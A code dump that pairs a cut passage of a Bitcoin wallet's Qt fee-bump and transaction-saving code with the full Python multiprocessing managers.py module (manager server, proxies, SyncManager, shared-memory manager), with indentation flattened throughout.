def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token',
'SharedMemoryManager' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import types
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = { #XXX: register dill?
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = getattr(time,'monotonic',time.time)() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - getattr(time,'monotonic',time.time)()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
__class_getitem__ = classmethod(types.GenericAlias)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocess.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(self, c, typeid, /, *args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(self, c, typeid, *args, **kwargs)
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
